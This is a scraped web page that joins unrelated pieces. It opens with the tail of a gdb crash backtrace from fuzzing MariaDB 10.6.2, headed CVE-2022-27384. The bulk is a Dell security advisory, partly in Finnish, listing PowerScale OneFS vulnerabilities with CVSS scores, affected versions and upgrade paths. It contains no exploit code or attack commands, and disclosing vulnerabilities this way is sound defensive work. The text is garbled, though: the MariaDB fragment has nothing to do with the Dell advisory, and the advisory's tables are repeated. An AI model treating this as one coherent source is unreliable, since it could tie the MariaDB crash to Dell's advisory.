    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#18 0x0000559d3b61314d in do\_handle\_one\_connection (connect=<optimized out>,

    put\_in\_cache=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#19 0x0000559d3b614807 in handle\_one\_connection (arg=arg@entry=0x608008ba4fb8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#20 0x0000559d3c45fef0 in pfs\_spawn\_thread (arg=0x617000005b98)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#21 0x00007f0f481e3609 in start\_thread (arg=<optimized out>)

    at pthread\_create.c:477

#22 0x00007f0f47db7293 in clone ()

    at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

gdb-peda$ quit

CVE-2022-27384: [MDEV-26047] MariaDB server crash at Item_subselect::init_expr_cache_tracker

Dell PowerScale OneFS, 8.2.x-9.3.x, contains a Improper Certificate Validation. A unauthenticated remote attacker could potentially exploit this vulnerability, leading to a man-in-the-middle capture of administrative credentials.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-22561

Dell PowerScale OneFS, versions 8.2.x-9.3.0.x, contain an improper restriction of excessive authentication attempts. An unauthenticated remote attacker may potentially exploit this vulnerability, leading to compromised accounts.

8.1

CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

CVE-2022-22549

Dell PowerScale OneFS, 8.2.x-9.3.x, contain an Improper Certificate Validation. A unauthenticated remote attacker may potentially exploit this vulnerability, leading to a man-in-the-middle capture of administrative credentials.

7.5

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-22559

Dell PowerScale OneFS, version 9.3.0, contains a use of a broken or risky cryptographic algorithm. An unprivileged network attacker may exploit this vulnerability, leading to the potential for information disclosure.

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2022-22562

Dell PowerScale OneFS, versions 8.2.0-9.2.1.x, contain an improper handling of missing values vulnerability. An unauthenticated network attacker may potentially exploit this denial-of-service vulnerability.

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-22560

Dell EMC PowerScale OneFS versions 8.1.x-9.2.1.x contain hard coded credentials. This may allow a local user with knowledge of the credentials to login as the admin user to the backend ethernet switch of a PowerScale cluster. The attacker may exploit this vulnerability to take the switch offline.

7.1

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2022-22550

Dell PowerScale OneFS, versions 8.2.2-9.3.0.x, contain a password disclosure vulnerability. An unprivileged local attacker may potentially exploit this vulnerability, leading to account takeover.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-22565

Dell PowerScale OneFS, versions 9.0.0-9.3.0 contain an improper authorization of index containing sensitive information. An authenticated and privileged user may potentially exploit this vulnerability, leading to disclosure or modification of sensitive data.

4.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 

**Third-party Component**

**CVEs**

**More information**

GNU gettext

CVE-2018-18751

https://nvd.nist.gov/vuln/detail/CVE-2018-18751   
https://www.gnu.org/software/gettext/ 

OpenSSL

CVE-2021-3712

https://nvd.nist.gov/vuln/detail/CVE-2021-3712   
https://www.openssl.org/news/secadv/20210824.txt 

Apache

Multiple

https://httpd.apache.org/security/vulnerabilities\_24.html

  

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-22561

Dell PowerScale OneFS, versions 8.2.x-9.3.0.x, contain an improper restriction of excessive authentication attempts. An unauthenticated remote attacker may potentially exploit this vulnerability, leading to compromised accounts.

8.1

CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

CVE-2022-22549

Dell PowerScale OneFS, 8.2.x-9.3.x, contain an Improper Certificate Validation. A unauthenticated remote attacker may potentially exploit this vulnerability, leading to a man-in-the-middle capture of administrative credentials.

7.5

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-22559

Dell PowerScale OneFS, version 9.3.0, contains a use of a broken or risky cryptographic algorithm. An unprivileged network attacker may exploit this vulnerability, leading to the potential for information disclosure.

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2022-22562

Dell PowerScale OneFS, versions 8.2.0-9.2.1.x, contain an improper handling of missing values vulnerability. An unauthenticated network attacker may potentially exploit this denial-of-service vulnerability.

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-22560

Dell EMC PowerScale OneFS versions 8.1.x-9.2.1.x contain hard coded credentials. This may allow a local user with knowledge of the credentials to login as the admin user to the backend ethernet switch of a PowerScale cluster. The attacker may exploit this vulnerability to take the switch offline.

7.1

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2022-22550

Dell PowerScale OneFS, versions 8.2.2-9.3.0.x, contain a password disclosure vulnerability. An unprivileged local attacker may potentially exploit this vulnerability, leading to account takeover.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-22565

Dell PowerScale OneFS, versions 9.0.0-9.3.0 contain an improper authorization of index containing sensitive information. An authenticated and privileged user may potentially exploit this vulnerability, leading to disclosure or modification of sensitive data.

4.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 

**Third-party Component**

**CVEs**

**More information**

GNU gettext

CVE-2018-18751

https://nvd.nist.gov/vuln/detail/CVE-2018-18751   
https://www.gnu.org/software/gettext/ 

OpenSSL

CVE-2021-3712

https://nvd.nist.gov/vuln/detail/CVE-2021-3712   
https://www.openssl.org/news/secadv/20210824.txt 

Apache

Multiple

https://httpd.apache.org/security/vulnerabilities\_24.html

  

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-22561

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

PowerScale OneFS Downloads Area

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2022-22549

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2022-22559

n/a

Upgrade your version of OneFS

9.3.0.x

Download and install the latest RUP

CVE-2022-22562

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x and 9.2.1.x

Download and install the latest RUP

CVE-2022-22560

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x and 9.2.1.x

Download and install the latest RUP

CVE-2022-22550

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2018-18751

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2021-3712

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

Apache: Multiple

8.2.x, 9.0.0.x, 9.1.1.x, 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, 9.3.0.x

Download and install the latest RUP

CVE-2022-22565

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

Note: The table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.  

**CVEs Addressed**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-22561

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

PowerScale OneFS Downloads Area

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2022-22549

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2022-22559

n/a

Upgrade your version of OneFS

9.3.0.x

Download and install the latest RUP

CVE-2022-22562

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x and 9.2.1.x

Download and install the latest RUP

CVE-2022-22560

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x and 9.2.1.x

Download and install the latest RUP

CVE-2022-22550

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2018-18751

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

CVE-2021-3712

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

Apache: Multiple

8.2.x, 9.0.0.x, 9.1.1.x, 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, 9.3.0.x

Download and install the latest RUP

CVE-2022-22565

8.2.x, 9.0.0.x, 9.1.1.x, and 9.2.0.x

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x

Download and install the latest RUP

Note: The table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.  

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-01-31

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

31 tammik. 2022

Tag

#dos